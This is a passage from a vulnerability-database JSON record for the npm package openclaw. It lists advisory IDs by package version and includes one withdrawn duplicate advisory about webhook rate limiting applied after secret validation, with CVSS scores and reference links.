vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13"}],"aliases":["GHSA-xwcj-hwhf-h378"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gncw-wfqt-9yek"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91067?format=json","vulnerability_id":"VCID-gv2d-gfs7-gfh1","summary":"Duplicate Advisory: OpenClaw has Bypass in Webhook Rate Limiting via Pre-Authentication Secret Validation\n### Duplicate Advisory\nThis advisory has been withdrawn because CVE-2026-34508 has been rejected as a duplicate of CVE-2026-34505. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.12 applies rate limiting only after webhook authentication succeeds, allowing attackers to bypass rate limits and brute-force webhook secrets without triggering 429 responses. Attackers can repeatedly guess invalid secrets to discover valid credentials and subsequently submit forged Zalo webhook traffic.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34508","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34508"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation-2","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation-2"},{"reference_url":"https://github.com/advisories/GHSA-8288-jpqp-95fx","reference_id":"GHSA-8288-jpqp-95fx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8288-jpqp-95fx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"}